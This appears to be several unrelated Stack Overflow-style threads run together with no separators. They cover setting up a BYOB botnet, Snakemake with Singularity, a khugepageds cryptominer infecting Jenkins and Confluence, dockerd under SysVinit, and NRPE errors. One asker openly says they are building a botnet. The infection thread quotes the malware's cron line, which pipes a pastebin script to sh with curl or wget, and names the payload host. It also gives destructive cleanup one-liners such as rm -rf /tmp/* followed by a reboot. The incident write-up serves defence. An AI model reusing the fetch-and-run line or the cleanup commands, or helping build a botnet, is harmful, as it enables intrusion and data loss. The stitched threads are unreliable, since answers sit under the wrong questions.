(I have seen other solutions to "Errno 48" issues on Stack Overflow, but none have worked for me yet.)
I am trying to develop a botnet using BYOB from GitHub: https://github.com/malwaredllc/byob
I am encountering an address-in-use error every time I run the command sudo ./startup.sh. It returns OSError: [Errno 48] Address already in use.
However, when I run ps -fA | grep python and try to kill the matching process (502 18126 16973 0 9:16PM ttys000 0:00.00 grep python) with kill -9 18126, I get this error: kill: kill 18126 failed: no such process.
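For clarity, the exact sequence I'm running looks like this:

ps -fA | grep python
#  502 18126 16973   0  9:16PM ttys000    0:00.00 grep python
kill -9 18126
# kill: kill 18126 failed: no such process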
Does anyone have any idea what to do?
I am using a Mac with an M1 Pro chip running macOS 12.0.1 Monterey. Also, byob is trying to run on port 5000 of IPv4 127.0.0.1 (this is the loopback address, not my public IP): http://127.0.0.1:5000.
In case you try to reproduce the problem: you need to install docker.io or the Docker Desktop app (depending on your OS), then navigate to <outer-dir>/byob-master/web-gui and execute sudo ./startup.sh. The code will not work without access to Docker, and the program needs to be run with admin permissions via sudo. The downloads take a while, and it will prompt you to restart once. When I run it again after the restart, I hit this problem.
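In shell terms, the reproduction boils down to:

docker info    # confirm the Docker daemon is reachable first
cd <outer-dir>/byob-master/web-gui
sudo ./startup.sh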
Please let me know if someone was able to fix this. Thanks!
I'm trying to tie scripts from an existing Docker-based pipeline into my Snakemake pipeline. I have the Docker pipeline set up to run via Singularity, and it works. For instance,
singularity exec docker://mypipeline some_command.sh file.bam out_file.bam
works perfectly when I run it interactively on the command line. Similarly, when I incorporate the exact same command into my Snakefile it also works:
rule myrule:
    input:
        "file.bam"
    output:
        "out_file.bam"
    shell:
        "singularity exec docker://mypipeline some_command.sh {input} {output}"
However, when I try to follow this tutorial https://reproducibility.sschmeier.com/container/index.html#using-a-container-in-our-workflow and incorporate the container into my workflow as follows:
singularity: "docker://mypipeline"

rule myrule:
    input:
        "file.bam"
    output:
        "out_file.bam"
    shell:
        "some_command.sh {input} {output}"
and run snakemake -p --use-singularity --cores 1, I get the following output:
Building DAG of jobs...
Using shell: /bin/bash
Provided cores: 1 (use --cores to define parallelism)
Rules claiming more threads will be scaled down.
Job counts:
    count    jobs
    1        myrule
    1
[Sun May 17 15:28:11 2020]
rule myrule:
input: file.bam
output: out_file.bam
jobid: 0
some_command.sh file.bam out_file.bam
Activating singularity image myImage.simg
Then I get a very long report that I'm not sure what to make of, followed by this error message:
Waiting at most 5 seconds for missing files.
MissingOutputException in line 3 of Snakefile:
Job completed successfully, but some output files are missing. Missing files after 5 seconds:
out_file.bam
This might be due to filesystem latency. If that is the case, consider to increase the wait time with --latency-wait.
Shutting down, this might take some time.
Exiting because a job execution failed. Look above for error message
Complete log: .snakemake/log/2020-05-17T152810.484310.snakemake.log
My questions:
Why does one work and not the other, and how can I get the last example to work?
Is it good practice to declare singularity: "docker://..." upfront, or does it not matter?
The error message suggests the singularity command executed successfully, but Snakemake doesn't see the output file. Is the output file out_file.bam shown in your code the same one you actually use, or did you strip out part of the file path? I would suggest adding the --verbose flag to snakemake and reviewing the actual singularity command that Snakemake executes.
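For example, the same invocation as above with the extra flag:

snakemake -p --verbose --use-singularity --cores 1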
The picture above shows a process named khugepageds that is using 98 to 100% CPU at times.
I tried to find out how Jenkins uses this command, or what to do about it, but was not successful.
I did the following
pkill jenkins
service jenkins stop
service jenkins start
When I pkill it, the usage of course goes down, but once Jenkins restarts, it's back up again.
Anyone had this issue before?
So, we just had this happen to us. As per the other answers, and some digging of our own, we were able to kill the process (and keep it killed) by running the following command:
rm -rf /tmp/*; crontab -r -u jenkins; kill -9 PID_OF_khugepageds; crontab -r -u jenkins; rm -rf /tmp/*; reboot -h now;
Make sure to replace PID_OF_khugepageds with the PID on your machine. The command also clears the crontab entry. Run it all as one line so that the process can't resurrect itself; the machine will reboot per the last command.
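To find the PID, something like this works:

pgrep khugepageds   # prints the PID(s) of the khugepageds process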
NOTE: While the command above should kill the process, you will probably want to roll/regenerate your SSH keys (on the Jenkins machine, BitBucket/GitHub etc., and any other machines that Jenkins had access to) and perhaps even spin up a new Jenkins instance (if you have that option).
Yes, we were also hit by this vulnerability; thanks to pittss's answer we were able to find out a bit more about it.
You should check /var/log/syslog for the curl pastebin script, which starts a cron job on the system; it will try to regain escalated access via the /tmp folder and install unwanted packages/scripts.
You should remove everything from the /tmp folder, stop Jenkins, check the cron entries and remove the ones that seem suspicious, then restart the VM.
The vulnerability drops unwanted executables in the /tmp folder and tries to access the VM via SSH.
It also adds a cron entry on your system, so be sure to remove that as well.
Also check known_hosts and authorized_keys in the ~/.ssh folder for any suspicious SSH public keys; the attacker can add their own keys to get access to your system.
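For example (the Jenkins home path below is an assumption; adjust it for your install):

cat /var/lib/jenkins/.ssh/authorized_keys   # look for keys you did not add
cat /var/lib/jenkins/.ssh/known_hosts       # look for hosts you do not recognize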
Hope this helps.
This is a Confluence vulnerability https://nvd.nist.gov/vuln/detail/CVE-2019-3396 published on 25 Mar 2019. It allows remote attackers to achieve path traversal and remote code execution on a Confluence Server or Data Center instance via server-side template injection.
Possible solution
Do not run Confluence as root!
Stop botnet agent: kill -9 $(cat /tmp/.X11unix); killall -9 khugepageds
Stop Confluence: <confluence_home>/app/bin/stop-confluence.sh
Remove broken crontab: crontab -u <confluence_user> -r
Plug the hole by blocking access to the vulnerable path /rest/tinymce/1/macro/preview in your frontend server; for nginx it is something like this:
location /rest/tinymce/1/macro/preview {
    return 403;
}
Restart Confluence.
The exploit
It contains two parts: a shell script from https://pastebin.com/raw/xmxHzu5P and an x86_64 Linux binary from http://sowcar.com/t6/696/1554470365x2890174166.jpg
The script first kills all other known trojan/virus/botnet agents, downloads and spawns the binary as /tmp/kerberods, and iterates through /root/.ssh/known_hosts trying to spread itself to nearby machines.
The binary (size 3395072, dated Apr 5 16:19) is packed with the LSD executable packer (http://lsd.dg.com). I haven't examined yet what it does; it looks like a botnet controller.
It seems like the vulnerability. Try looking in the syslog (/var/log/syslog, not the Jenkins log) for a line like this: CRON (jenkins) CMD ((curl -fsSL https://pastebin.com/raw/***||wget -q -O- https://pastebin.com/raw/***)|sh).
If you find it, stop Jenkins, clear the /tmp directory, and kill all processes started by the jenkins user.
If CPU usage drops after that, update Jenkins to the latest LTS version; then, after starting Jenkins, update all its plugins.
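A sketch of that cleanup, assuming Jenkins runs as the jenkins user:

grep 'CRON (jenkins)' /var/log/syslog   # look for the curl|sh line
service jenkins stop
rm -rf /tmp/*
pkill -9 -u jenkins                     # kill anything still running as jenkins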
A solution that works (because the cron file just gets recreated) is to empty the jenkins user's cron file; I also changed its ownership and made the file immutable.
This finally stopped the process from kicking in.
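A minimal sketch of those steps, assuming a Debian-style cron spool (the path may differ on your distro):

: > /var/spool/cron/crontabs/jenkins        # empty the jenkins cron file
chown root:root /var/spool/cron/crontabs/jenkins
chattr +i /var/spool/cron/crontabs/jenkins  # make it immutable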
In my case this was making builds fail randomly with the following error:
Maven JVM terminated unexpectedly with exit code 137
It took me a while to pay due attention to the khugepageds process, since every place I read about this error, the suggested solution was to increase memory.
The problem was solved with HeffZilla's solution.
At the moment I'm working with ARM64-based Debian images and Docker.
I want to start the Docker daemon automatically on boot so we do not have to start it manually. But the images do not use systemd, just good old SysVinit.
So I thought: quite easy, simply an init script that runs dockerd (or start-stop-daemon with dockerd as the argument). But no, it does not work. The command dockerd -v works fine during boot (checked by piping the output to a log file). But when dockerd is executed without an argument, i.e. simply starting the daemon, nothing happens: no error, no warning, nothing is piped to the log file.
So my question is: are there any other processes that need to be started, or any configuration that needs to be done, before this dockerd command can be started?
When boot has finished and I SSH into the device and run dockerd manually, everything works fine.
Just to close this question myself :D
I noticed that on the SysVinit system, the PATH variable is not set when the init scripts are started (maybe because root starts the processes).
So in my init script I just set the PATH variable to include the folder containing dockerd, and everything worked! :D
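A minimal sketch of such an init script (the PATH value and log file are assumptions; check which dockerd on your image):

#!/bin/sh
# /etc/init.d/docker - start dockerd on a SysVinit system
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
export PATH

case "$1" in
    start)
        dockerd >>/var/log/dockerd.log 2>&1 &
        ;;
    stop)
        start-stop-daemon --stop --name dockerd
        ;;
esac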
I'm using Icinga to monitor some servers and services. Most of them run fine. But now I'd like to monitor a JBoss AS on one server via NRPE. For that I'm using the check_jboss plugin from MonitoringExchange. However, each time I try running a test command from my Icinga server via NRPE, I get a NRPE: Unable to read output error. When I execute the command directly on the monitored server, it runs fine.
It's strange that the execution on the monitored server takes around 5 seconds to return an acceptable result, while the NRPE execution returns the error immediately. Raising the NRPE timeout didn't solve the problem. I also checked the permissions of the check_jboss plugin and set them to 777, so there should be no permission error.
I don't think there's a general issue with NRPE, because some other checks (e.g. check_load, check_disk, ...) also run via NRPE and they all work fine. The permissions of those plugins are the same as for my check_jboss plugin.
The following is a sample execution on the monitored server, which runs fine:
/usr/lib64/nagios/plugins/check_jboss.pl -T ServerInfo -J jboss.system -a MaxMemory -w 3000: -c 2000: -f
JBOSS OK - MaxMemory is 4049076224 | MaxMemory=4049076224
Here are two command executions via NRPE from my Icinga server. Both commands are configured correctly:
./check_nrpe -H xxx.xxx.xxx.xxx -c check_hda1
DISK OK - free space: / 47452 MB (76% inode=97%);| /=14505MB;52218;58745;0;65273
./check_nrpe -H xxx.xxx.xxx.xxx -c jboss_MaxMemory
NRPE: Unable to read output
Does anyone have a hint for me? If further config information is needed, please ask :)
Try to rule out SELinux, either by disabling it globally or by changing the plugin's SELinux type to nagios_unconfined_plugin_exec_t.
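A sketch of how to test that (the plugin path comes from the question; setenforce 0 is temporary, for testing only):

getenforce      # Enforcing means SELinux could be blocking the plugin
setenforce 0    # switch to permissive temporarily, then retry the NRPE check
chcon -t nagios_unconfined_plugin_exec_t /usr/lib64/nagios/plugins/check_jboss.pl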